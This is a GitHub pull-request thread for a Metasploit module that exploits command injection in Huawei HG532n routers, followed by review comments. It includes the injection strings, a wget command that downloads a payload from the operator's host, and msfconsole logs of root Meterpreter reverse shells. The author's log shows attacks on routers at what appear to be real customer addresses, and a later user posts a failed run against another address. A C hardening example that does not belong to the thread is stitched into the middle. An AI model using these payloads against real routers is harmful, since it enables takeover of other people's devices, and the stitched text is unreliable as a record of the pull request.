
Add Huawei HG532n command injection exploit #8245

Merged
merged 5 commits into from Apr 17, 2017

Conversation

@a-darwish
Contributor

@a-darwish a-darwish commented Apr 15, 2017

The Huawei HG532n routers, shipped by TE-Data Egypt, are vulnerable to a command injection exploit in the ping field of their limited shell interface, leading to a root shell.

TE-Data, the incumbent ISP operator in Egypt, provided this router to customers by default. A 3-day fingerprinting network scan shows around 50,000+ devices exploitable in the wild.

Affected hardware/software version strings:

  Manufacturer: Huawei Technologies Co., Ltd.
  Product Style: HG532n
  SN: B7J7SB9381703791
  IP: 192.168.1.1
  Hardware Version: HG532EAM1HG530ERRAMVER.B
  Software Version: V100R001C105B016 TEDATA

The web interface has two kinds of logins: a limited user:user login given to all customers, and an admin mode used by the company's technical staff. For machines within the TE-Data network, this web interface is remotely accessible.

The web interface's user mode provides very limited functionality, only Wi-Fi password changes and NAT port forwarding. Nonetheless, by port forwarding the router's own (filtered) telnet port, it becomes remotely accessible.

Due to the ISP's (encrypted) runtime router configuration at /etc/defaultcfg.xml, though, the telnet daemon does not provide a direct Linux shell. Rather, a very limited custom shell is provided instead, called the "ATP command line tool". Upon disassembling this user-facing binary, it's discovered that the limited shell has a hidden ping command which falls back to the system's own shell (ping %s > /var/res_ping). We exploit that through command injection to gain Meterpreter root access:

[darwish@Home-PC]$ telnet 41.36.32.88 35000 
Trying 41.36.32.88...
Connected to 41.36.32.88.
Escape character is '^]'.
HG520b> help
Welcome to ATP command line tool.
If any question, please input "?" at the end of command.

HG520b>?
cls 
debug 
ip 
sys 
lan 
help 
save 
? 
exit 

HG520b> debug display cwmp
...
CPE OUI:00E0FC
CPE ProductClass:HG532n
CPE SerialNumber:B7J7SB9390600466
CPE Manufacture:Huawei Technologies Co., Ltd.
CPE ModelName:HG532n

HG520b> ping ?;cat${IFS}/proc/cpuinfo;true
ping: bad address '?'
system type		: Ralink RT63365 SOC
processor		: 0
cpu model		: MIPS 34K V5.5
BogoMIPS		: 332.59
wait instruction	: yes
microsecond timers	: yes
tlb_entries		: 32
extra interrupt vector	: yes
hardware watchpoint	: yes
ASEs implemented	: mips16 dsp mt
VCED exceptions		: not available
VCEI exceptions		: not available
Success
ping result:

Verification

Since this is specific to a certain hardware device, please find below PCAP captures (and msfconsole log) for two remotely attacked routers -- on different Internet subnets.

huawei-hg532n-pcap-capture.zip

Also kindly check below a screenshot of the exploit + an example run when VERBOSE is set to true:

router1-exploit

$ msfconsole
msf > use exploit/linux/http/huawei_hg532n_cmdinject

msf exploit(huawei_hg532n_cmdinject) > set RHOST 197.38.98.11
RHOST => 197.38.98.11

msf exploit(huawei_hg532n_cmdinject) > set SRVHOST 41.34.32.121
SRVHOST => 41.34.32.121

msf exploit(huawei_hg532n_cmdinject) > set LHOST 41.34.32.121
LHOST => 41.34.32.121

msf exploit(huawei_hg532n_cmdinject) > set VERBOSE true
VERBOSE => true

msf exploit(huawei_hg532n_cmdinject) > exploit
[*] Exploit running as background job.
msf exploit(huawei_hg532n_cmdinject) >
[-] Handler failed to bind to 41.34.32.121:4444:-  -
[*] Started reverse TCP handler on 0.0.0.0:4444
[*] Validating router's HTTP server (197.38.98.11:80) signature
[+] Good. Router seems to be a vulnerable HG532n device
[+] Telnet port forwarding succeeded; exposted telnet port = 33552
[*] Connecting to just-exposed telnet port 33552
[+] Connection succeeded. Passing telnet credentials
[*] Received new reply token = '������
Password:'
[*] Received new reply token = 'Password:'
[+] Credentials passed; waiting for prompt 'HG520b>'
[*] Received new reply token = 'HG520b>'
[+] Prompt received. Telnet access fully granted!
[*] Starting web server; hostinig /MDGuEPiUDBRXD
[*] Using URL: http://0.0.0.0:8080/MDGuEPiUDBRXD
[*] Local IP: http://192.168.1.3:8080/MDGuEPiUDBRXD
[*] Runninig command on target: wget -g -v -l /tmp/zjtmztfz -r /MDGuEPiUDBRXD -P8080 41.34.32.121
[*] Received new reply token = 'p'
[*] Received new reply token = 'ing ?;wget${IFS}-g${IFS}-v${IFS}-l${IFS}/tmp/zjtmztfz${IFS}-r${IFS}/MDGuEPiUDBRXD${IFS}-P8080${IFS}41.34.32.121;true'
[*] Received new reply token = 'ping: bad address '?''
[+] HTTP server received request. Sending payload to victim
[*] Received new reply token = 'The IP is [41.34.32.121]'
[*] Received new reply token = 'Success
ping result:
HG520b>'
[+] Command executed succesfully
[*] Runninig command on target: chmod 777 /tmp/zjtmztfz
[*] Received new reply token = 'p'
[*] Received new reply token = 'ing ?;chmod${IFS}777${IFS}/tmp/zjtmztfz;trueping: bad address '?'

Success
ping result:
HG520b>'
[+] Command executed succesfully
[*] Runninig command on target: /tmp/zjtmztfz
[*] Received new reply token = 'p'
[*] Received new reply token = 'ing ?;/tmp/zjtmztfz&trueping: bad address '?'

Success
ping result:
HG520b>'
[+] Command executed succesfully
[*] Runninig command on target: rm /tmp/zjtmztfz
[*] Received new reply token = 'p'
[*] Received new reply token = 'ing ?;rm${IFS}/tmp/zjtmztfz;trueping: bad address '?'

Success
ping result:
HG520b>'
[+] Command executed succesfully
[*] Waiting for the payload to connect back ..
[*] Meterpreter session 1 opened (192.168.1.3:4444 -> 197.38.98.11:50097) at 2017-04-15 16:45:05 +0200
[+] Payload connected!
[*] Server stopped.

msf exploit(huawei_hg532n_cmdinject) > sessions 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : 192.168.1.1
OS           :  (Linux 2.6.21.5)
Architecture : mips
Meterpreter  : mipsbe/linux
meterpreter >

Style

  • rubocop clean. This is true except for the comment: Assignment Branch Condition size for <method> is too high.; the mentioned methods cannot be made any shorter.
  • msftidy clean.
  • Documentation attached in pull request documentation/modules/exploit/linux/http/huawei_hg532n_cmdinject.md
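The injection described in this PR comes from pasting the user-supplied ping argument into a shell command line. As an added example (not code from the PR or from the Huawei firmware; the function names and the exact validation rules are hypothetical), here is that pattern next to a hardened version that validates the argument and runs ping without any shell:

```c
#include <ctype.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

#define RES_PATH "/var/res_ping"

/* The pattern the PR describes (hypothetical reconstruction, not Huawei's
 * actual code): the user's argument is pasted into a shell command line,
 * so ';', '&' and ${IFS} are interpreted by sh -c rather than by ping. */
int ping_cmdline_vulnerable(const char *host, char *out, size_t outlen)
{
    return snprintf(out, outlen, "ping %s > " RES_PATH, host);
}

/* Hardened input check: allow only characters that a hostname or an
 * IPv4/IPv6 literal can contain, and refuse a leading '-' so the value
 * can never be parsed as a ping option. */
int is_safe_host(const char *host)
{
    size_t n = strlen(host);
    if (n == 0 || n > 253 || host[0] == '-')
        return 0;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)host[i];
        if (!isalnum(c) && c != '.' && c != '-' && c != ':')
            return 0;
    }
    return 1;
}

/* Hardened runner: no shell at all. The validated host is passed as a
 * single argv element and stdout is redirected with dup2, so there is
 * no command line for an attacker to break out of.
 * Returns ping's exit status, or -1 if the host was rejected or the
 * process could not be started. */
int ping_hardened(const char *host)
{
    if (!is_safe_host(host))
        return -1;
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        int fd = open(RES_PATH, O_WRONLY | O_CREAT | O_TRUNC, 0644);
        if (fd >= 0) {
            dup2(fd, STDOUT_FILENO);
            close(fd);
        }
        execlp("ping", "ping", "-c", "4", host, (char *)NULL);
        _exit(127);
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

The vulnerable builder only shows the string that would reach `system()`; the hardened runner rejects the PR's `?;...${IFS}...` argument before any process is started.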
# the router's busybox echo does not understand the necessary
# "-en" options. It outputs them to the binary instead.
#
# We could not also use the `wget' command stager, as Huawei


@h00die

h00die Apr 15, 2017
Contributor

This is priceless, and should also (and possibly is) captured in the docs. First suggestion was going to be to use wget stager, but you already captured why it wouldn't work. Very nice!


@a-darwish

a-darwish Apr 16, 2017
Author Contributor

@h00die Thanks a lot 😊😊

What would you suggest as a good place for documenting this; the module's own markdown docs? There are other Huawei-specific options beside the ones used above, so yes it's worth documenting indeed.

P.S. If this is to be merged, in another PR I can modify the wget stager to have a new opts[:huawei] option that produces the Huawei-specific wget parameters. Then in that same new PR we can modify this module to use the new wget stager ;-)


@wvu-r7

wvu-r7 Apr 17, 2017
Member

I think it's fine to save it for next time.


@h00die

h00die Apr 17, 2017
Contributor

I would make a section in this module's markdown docs called notes (prob the 2nd section, after vulnerable app but before commands to use the module). That will shorten the module and make it easy to see. You could then change the in-module comments to say something like "see notes in docs for additional details" so it's obvious there's info elsewhere to check.

Also up for suggestions or any other ideas.
Every comment shouldn't be converted to the markdown docs but some of the longer more explanatory ones would be better there.


@a-darwish

a-darwish Apr 17, 2017
Author Contributor

@h00die Done. Module info hash and other comments properly abridged. Documentation file expanded (wget details, mips toolchain builds, etc.)

@wwebb-r7
Contributor

@wwebb-r7 wwebb-r7 commented Apr 15, 2017

I'd suggest maybe moving most of the stuff in the info hash to the docs. Keep it somewhat along the lines of:

This module exploits an ABC vulnerability present in XYZ widgets version 123. Exploitation of this vulnerability results in remote something something in the security context of whatever-user. Other brief explanations of stuff that you feel are necessary are ok to put here as well.

Otherwise everything looks good at first glance. Do you happen to have a firmware image for this device?

@a-darwish
Contributor Author

@a-darwish a-darwish commented Apr 16, 2017

@wwebb-r7:

I'd suggest maybe moving most of the stuff in the info hash to the docs ...

Sure, will update the PR now. (Edit: done)

Otherwise everything looks good at first glance. Do you happen to have a firmware image for this device?

Yeah, /dev/mtdblock[0123] are easily extractable from all attacked devices. Using binwalk on mtdblock3 contents also produces a direct squashfs root image. I can send any of those upon request 😃

@wwebb-r7
Contributor

@wwebb-r7 wwebb-r7 commented Apr 16, 2017

Nice. Email them to msfdev@metasploit.com - we prefer to test it if at all possible; however, if we find that we just don't have the time, we'll fall back on the pcap you provided.

@a-darwish
Contributor Author

@a-darwish a-darwish commented Apr 16, 2017

@wwebb-r7 commented on Apr 16, 2017, 11:50 AM GMT+3:

Nice. Email them to msfdev@metasploit.com - we prefer to test it if at all possible; however, if we find that we just don't have the time, we'll fall back on the pcap you provided.

Ok. I'm preparing a VM now for the r7 team to log in to. Hosts outside the ISP network will not be able to access the target routers' port 80, so this will be a VM from within, where things should work.

@busterb busterb self-assigned this Apr 17, 2017
# IO redirection.
#
def execute_command(command, error_regex = nil, background: false)
print_status "Runninig command on target: #{command}"


@wvu-r7

wvu-r7 Apr 17, 2017
Member

This looks like a typo.

@busterb
Member

@busterb busterb commented Apr 17, 2017

Looks good to me, nice work. We can help make sure that the operator gets the note too.

end

if res.body.include? valid_port_export_marker
print_good "Telnet port forwarding succeeded; exposted telnet port = #{external_telnet_port}"


@wvu-r7

wvu-r7 Apr 17, 2017
Member

Exposed?


@telnet_sock.write(atp_cmd + OPT_NAOFFD + OPT_BINARY)
telnet_prompt_wait(error_regex)
print_good "Command executed succesfully"


@wvu-r7

wvu-r7 Apr 17, 2017
Member

Successfully?

if datastore['DOWNHOST']
print_status "Will not start local web server, as DOWNHOST is already defined"
else
print_status("Starting web server; hostinig #{resource_uri}")


@wvu-r7

wvu-r7 Apr 17, 2017
Member

Hosting?

wget_cmd = "wget -g -v -l #{output_file} -r #{payload_uri} -P#{srv_port} #{srv_host}"

execute_command(wget_cmd, [/cannot connect/, /\d+ error/]) # `404 error', etc.
execute_command("chmod 777 #{output_file}", /No such file/)


@wvu-r7

wvu-r7 Apr 17, 2017
Member

700 should be fine, no?


@busterb

busterb Apr 17, 2017
Member

yeah I presume it should

a-darwish added 2 commits Apr 17, 2017
Use u+rwx permissions only, instead of full 777, while staging the
wget binary to target. As suggested by @wvu-r7 and @busterb.
external_telnet_port = rand(32767) + 32768

portmapping_page = '/html/application/portmapping.asp'
url_append = "?x=InternetGatewayDevice.WANDevice.1.WANConnectionDevice.1.WANPPPConnection.1.PortMapping&RequestFile=#{portmapping_page}"


@wvu-r7

wvu-r7 Apr 17, 2017
Member

vars_get?


res = send_request_cgi(
'method' => 'POST',
'uri' => "/html/application/del.cgi?RequestFile=#{portmapping_page}",


@wvu-r7

wvu-r7 Apr 17, 2017
Member

vars_get?

- Add section on compiling custom binaries for the device
- Add documentation for Huawei's wget flavor (thanks @h00die)
- Abridge the module's info hash contents (thanks @wwebb-r7)
- Abridge the module's comments; reference documentation (@h00die)
@a-darwish a-darwish force-pushed the a-darwish:hg532n_cmdinjection_module branch from 807def2 to 7daec53 Apr 17, 2017
Instead of rolling our own GET parameters implementation.

Thanks @wvu-r7!
@a-darwish a-darwish force-pushed the a-darwish:hg532n_cmdinjection_module branch from 39d45d5 to e21504b Apr 17, 2017
@busterb busterb merged commit e21504b into rapid7:master Apr 17, 2017
1 check passed
continuous-integration/travis-ci/pr The Travis CI build passed
@busterb
Member

@busterb busterb commented Apr 17, 2017

Release Notes

The exploits/linux/http/huawei_hg532n_cmdinject module has been added to the framework. It exploits Huawei HG532n routers, which, as shipped by TE-Data Egypt, are vulnerable to a command injection exploit in the ping field of their limited shell interface.

@busterb
Member

@busterb busterb commented Apr 17, 2017

Thanks @a-darwish , great module and contribution.

@todb-r7 todb-r7 mentioned this pull request Apr 18, 2017
@Boushy

@Boushy Boushy commented Apr 26, 2017

[-] Exploit failed: NoMethodError undefined method `match?' for #String:0x00000003bc3600
always happens

@a-darwish
Contributor Author

@a-darwish a-darwish commented Apr 27, 2017

@Boushy Update your environment to the required ruby-2.4 version where the String.match? method is defined. A simple $ bundle install should automatically do that since this is explicitly stated in the repository's .ruby-version file.

P.S. Merged pull requests are not a place for asking for help. Discuss over IRC or open an explicit GitHub issue ticket for that.

@wvu-r7
Member

@wvu-r7 wvu-r7 commented Apr 27, 2017

Great response, @a-darwish!!

@abkrenoo

@abkrenoo abkrenoo commented Nov 18, 2017

I get this please help


[-] Handler failed to bind to 156.202.xxx.xxx:443:- -
[*] Started reverse TCP handler on 0.0.0.0:443
[*] Validating router's HTTP server (156.203.xxx.xxx:80) signature
msf exploit(41895) > [+] Good. Router seems to be a vulnerable HG532n device
[+] Telnet port forwarding succeeded; exposed telnet port = 34401
[*] Connecting to just-exposed telnet port 34401
[+] Connection succeeded. Passing telnet credentials
[*] Received new reply token = '������
Password:'
[*] Received new reply token = 'Password:'
[+] Credentials passed; waiting for prompt 'HG520b>'
[*] Received new reply token = 'HG520b>'
[+] Prompt received. Telnet access fully granted!
[*] Starting web server; hosting /EGcNepbLKnzPx
[*] Using URL: http://0.0.0.0:8080/EGcNepbLKnzPx
[*] Local IP: http://192.168.1.108:8080/EGcNepbLKnzPx
[*] Running command on target: wget -g -v -l /tmp/sshrqizh -r /EGcNepbLKnzPx -P8080 156.202.xx.xx
[*] Received new reply token = 'p'
[*] Received new reply token = 'ing ?;wget${IFS}-g${IFS}-v${IFS}-l${IFS}/tmp/sshrqizh${IFS}-r${IFS}/EGcNepbLKnzPx${IFS}-P8080${IFS}156.202.xxx.xx;true'
[*] Received new reply token = 'ping: bad address '?''
[*] Received new reply token = 'The IP is [156.202.xx.xxx]'
[*] Received new reply token = 'wget: Transfer timeout!

Success
ping result:
HG520b>'
[+] Command executed successfully
[*] Running command on target: chmod 700 /tmp/sshrqizh
[*] Received new reply token = 'p'
[*] Received new reply token = 'ing ?;chmod${IFS}700${IFS}/tmp/sshrqizh;trueping: bad address '?'
chmod: /tmp/sshrqizh: No such file or directory

Success
ping result:
HG520b>'
[-] Exploit aborted due to failure: unexpected-reply: Error expression (?-mix:No such file) included in reply
[*] Server stopped.

@h00die
Contributor

@h00die h00die commented Nov 18, 2017

I'm going to take a stab in the dark since you've given us little to go by (like info on the target, since you are authorized to test it and all), and haven't shown us the options...
First line, can't bind to interface.
However this is a PR, not an issue. If it's a bug post an issue, not here. If you need help learning msf use IRC where people can assist.
Do not reply here.

@abkrenoo

@abkrenoo abkrenoo commented Nov 18, 2017

I'm sorry, I should have been more clear. The issue is in these last few lines
——
Success
ping result:
HG520b>'
[-] Exploit aborted due to failure: unexpected-reply: Error expression (?-mix:No such file) included in reply
[*] Server stopped.
———
the router is HG532n

options :

Name             Current Setting  Required  Description
----             ---------------  --------  -----------
DOWNFILE                          no        Filename to download, (default: random)
DOWNHOST                          no        Alternative host to request the MIPS payload from
HttpPassword     user             no        Web-interface username password
HttpUsername     user             no        Valid web-interface user-mode username
ListenerTimeout  60               yes       Number of seconds to wait for the exploit to connect back
Proxies                           no        A proxy chain of format type:host:port[,type:host:port][...]
RHOST            156.203.5.yy     yes       The target address
RPORT            80               yes       The target port (TCP)
SRVHOST          156.202.32.xx    yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT          8080             yes       The local port to listen on.
SSL              false            no        Negotiate SSL/TLS for outgoing connections
SSLCert                           no        Path to a custom SSL certificate (default is randomly generated)
TelnetPassword   admin            no        Telnet username password
TelnetUsername   admin            no        Valid router telnet username
URIPATH                           no        The URI to use for this exploit (default is random)
VHOST                             no        HTTP server virtual host

Payload options (linux/mipsbe/meterpreter_reverse_tcp):

Name   Current Setting  Required  Description
----   ---------------  --------  -----------
LHOST  156.202.32.xx    yes       The listen address
LPORT  443              yes       The listen port

Exploit target:

Id  Name
--  ----
0   Linux mipsbe Payload

@rapid7 rapid7 locked and limited conversation to collaborators Nov 18, 2017
@wwebb-r7
Contributor

@wwebb-r7 wwebb-r7 commented Nov 18, 2017

As mentioned by @h00die , this is not the place for module support. File an issue or see the IRC channel.
